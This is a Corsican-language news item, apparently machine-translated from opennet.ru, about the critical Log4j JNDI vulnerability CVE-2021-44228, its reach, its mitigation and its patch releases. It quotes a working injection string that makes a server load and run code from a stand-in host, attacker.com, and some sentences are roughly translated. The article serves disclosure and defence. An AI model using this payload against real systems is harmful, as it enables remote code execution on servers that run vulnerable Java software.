In Apache Log4j, un framework populari per urganizà u logu in l'applicazioni Java, hè stata identificata una vulnerabilità critica chì permette à u codice arbitrariu per esse eseguitu quandu un valore furmatu apposta in u formatu "{jndi:URL}" hè scrittu à u log. L'attaccu pò esse realizatu nantu à l'applicazioni Java chì registranu i valori ricivuti da fonti esterne, per esempiu, quandu mostranu valori problematiche in missaghji d'errore.
Hè nutatu chì quasi tutti i prughjetti chì utilizanu frameworks cum'è Apache Struts, Apache Solr, Apache Druid o Apache Flink sò affettati da u prublema, cumpresu Steam, Apple iCloud, Clienti Minecraft è servitori. Hè previstu chì a vulnerabilità puderia guidà à una onda di attacchi massivi à l'applicazioni corporative, ripetendu a storia di vulnerabili critichi in u framework Apache Struts, chì, secondu una stima approssimativa, hè utilizatu in l'applicazioni web da u 65% di Fortune. 100 cumpagnie inclusi i tentativi di scansà a rete per i sistemi vulnerabili.
U prublema hè aggravatu da u fattu chì un sfruttamentu di travagliu hè digià publicatu, ma i correzioni per i rami stabili ùn sò micca stati cumpilati. L'identificatore CVE ùn hè ancu statu assignatu. A correzione hè inclusa solu in u ramu di teste log4j-2.15.0-rc1. Cum'è una soluzione per bluccà a vulnerabilità, hè cunsigliatu di stabilisce u paràmetru log4j2.formatMsgNoLookups à veru.
U prublema hè statu causatu da u supportu di log4j per u trattamentu di maschere speciali "{}" in e linee di log, chì puderianu esse aduprate per eseguisce query JNDI (Java Naming and Directory Interface). L'attaccu si riduce à passà una stringa cù a sustituzione "${jndi:ldap://attacker.com/a}", chì, quandu hè trattata, log4j manderà. servitore Query LDAP di attacker.com per u percorsu di classe Java. Restituitu servitore U percorsu di l'attaccante (per esempiu http://second-stage.attacker.com/Exploit.class) serà caricatu è eseguitu in u cuntestu di u prucessu attuale, chì permette à l'attaccante d'eseguisce codice arbitrariu nantu à u sistema cù i privilegii di l'applicazione attuale.
Addendum 1: A vulnerabilità hè stata attribuita à l'identificatore CVE-2021-44228.
Addendum 2: Un modu per passà a prutezzione aghjuntu da a liberazione log4j-2.15.0-rc1 hè stata identificata. Una nova aghjurnazione, log4j-2.15.0-rc2, hè stata pruposta cù una prutezzione più cumpleta contra a vulnerabilità. U codice mette in risaltu u cambiamentu assuciatu cù l'absenza di una terminazione anormale in u casu di utilizà un URL JNDI formatatu incorrectamente.
Source: opennet.ru
